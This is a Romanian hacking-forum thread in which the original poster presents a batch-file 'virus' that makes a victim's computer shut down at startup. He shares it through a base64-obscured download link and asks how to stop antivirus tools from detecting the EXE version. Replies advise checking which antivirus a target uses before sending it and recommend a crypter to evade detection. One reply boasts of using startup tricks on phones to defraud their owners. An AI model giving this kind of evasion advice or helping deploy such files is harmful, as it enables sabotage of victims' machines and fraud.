Jump to content
robyyxx

Startup shutdown

By robyyxx, in Programe hacking

Recommended Posts

robyyxx Newbie

robyyxx

Posted
Posted

Am facut un simplu "virus" in notepad care copiaza shutdown la startup.

Adica stinge Calculatorul victimei cum il porneste.

Dar o problema si cer niste ajutor.

Eu il salvez ca fisier .bat il pun il scanez pe VT si e clean dar daca il convertesc in exe si pun icoana il detecteaza antivirusii fake.

Nush ce sa fac.

Pack contine ce am lucrat: bat (se poate deschide cu notepad), programu cu care l-am facut exe, si rezultatu.

Download: 

aHR0cCUzQS8vcmdob3N0Lm5ldC8zODA0MTQ2OQ==

Virus total fisier normal (bat):https://www.virustotal.com/file/075e81ad1d11be03ad6325a3646caf26ca9cd28d2a8ca312e0b5edde05c66a36/analysis/1336820396/

Scan la fisier exe:https://www.virustotal.com/file/d31ccd77a5d80dfbc7bc81c430e05017eacc0cbe513cf728e91eb9db9492afe6/analysis/1336819723/

Leam pus numele asta ca urma sa le trimit cuiva dar am vazut scannu la ele si.... .

In caz ca descideti ala exe scrieti la run 

shutdown -a

Stie cineva de ce il detecteaza ca fiind virus si pe ila bat nu? Sunt unu si acelas lucru doar ca e alt format

PS: B64

Ellimist Newbie

Ellimist

Posted
Posted

Bitdefender e singurul antivirus de acolo mai popular, in rest, nu cred ca ai de ce sa iti faci griji, sunt sanse oricum destul de mici ca victima sa aiba bitdefender. Poate ii tragi de limba intai sa vezi ce AV au, si apoi stii daca sa le trimiti sau nu.

bcman Newbie

bcman

Posted
Posted

@Ellimist

Deci F-Secure, GData, DrWeb ?i TrendMicro nu sunt cunoscute?

@roby

Ai gre?it când ai spus „sunt unul ?i acela?i, doar alt format”. Cite?te despre cum func?ioneaz? un antivirus ?i despre procesul de compilare. Când îl „converte?ti” în executabil, ac?iunile pe care ar trebui s? le fac? fi?ierul bat sunt înlocuite de echivalentul lor într-un limbaj de programare (s? zicem Visual Basic), iar apoi programul este compilat. Rezultatul este un executabil care face tot ce face acel bat (atâta timp cât exist? un echivalent între o comand? batch ?i una din Visual Basic). Antivirusul are o baz? de semn?turi, dar ?i o scanare comportamental?. La cea comportamental? sunt analizate ac?iunile programului (care, în cazul t?u, ori nu sunt detectate de antivirus, ori VT are scanarea comportamental? oprit? pentru to?i antiviru?ii, care e ?i cel mai probabil lucru). Semn?turile sunt „buc??i de cod”. Dac? vreun program con?ine o astfel de bucat? de cod, atunci antivirusul îl va depista ca malware pe baza acelei semn?turi. Nu prea ai ce face în afar? de a înv??a un limbaj de programare ?i s? încerci s? faci un program asem?n?tor, dar care s? nu fie detectat sau î?i faci rost de un crypter.

Danyel08 Newbie

Danyel08

Posted
Posted

11/42

Antivirus 	Result 	Update
AhnLab-V3 	- 	20120511
AntiVir 	- 	20120511
Antiy-AVL 	- 	20120512
Avast 	- 	20120512
AVG 	- 	20120511
BitDefender 	Gen:Variant.Barys.774 	20120512
ByteHero 	- 	20120511
CAT-QuickHeal 	- 	20120511
ClamAV 	- 	20120512
Commtouch 	- 	20120512
Comodo 	- 	20120512
DrWeb 	Trojan.Siggen3.54291 	20120512
Emsisoft 	Trojan-Dropper.Win32.Mudrop!IK 	20120512
eSafe 	- 	20120509
eTrust-Vet 	- 	20120511
F-Prot 	- 	20120511
F-Secure 	Gen:Variant.Barys.774 	20120512
Fortinet 	- 	20120508
GData 	Gen:Variant.Barys.774 	20120512
Ikarus 	Trojan-Dropper.Win32.Mudrop 	20120512
Jiangmin 	TrojanDropper.Mudrop.ddz 	20120512
K7AntiVirus 	- 	20120511
Kaspersky 	- 	20120511
McAfee 	- 	20120512
McAfee-GW-Edition 	- 	20120512
Microsoft 	- 	20120512
NOD32 	- 	20120512
Norman 	- 	20120511
nProtect 	- 	20120511
Panda 	- 	20120511
PCTools 	- 	20120512
Rising 	- 	20120511
Sophos 	- 	20120512
SUPERAntiSpyware 	- 	20120512
Symantec 	- 	20120512
TheHacker 	- 	20120511
TrendMicro 	PAK_Generic.001 	20120512
TrendMicro-HouseCall 	PAK_Generic.001 	20120511
VBA32 	TrojanDropper.Mudrop.slz 	20120511
VIPRE 	- 	20120512
ViRobot 	- 	20120512
VirusBuster 	Packed/MPress

ce plm sa detecteze, ca nu iti f-te windows-ul sau alte prostii...ii doar un simplu program care iti inchide pc, inchide, inchide:))

si dupa cum a zis si Elimist, antivirusurile care il detecteaza, nu sunt populare...HF!

Finutu Newbie

Finutu

Posted
Posted

Ai facut exact ce am facut si eu , insa pentru windows mobile :)

Am baieti care se ocupa cu telefoane aduse din afara si care avea win mobile dar in alta limba si eu le resoftam , insa pe ele le bagam asta in startup ori cu restart/shutdown sau sa activeze "airplane mode" si ramanea telefonul fara semnal si eu le cumparam la pret mic pe motiv ca e stricata bateria sau hardware:))

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...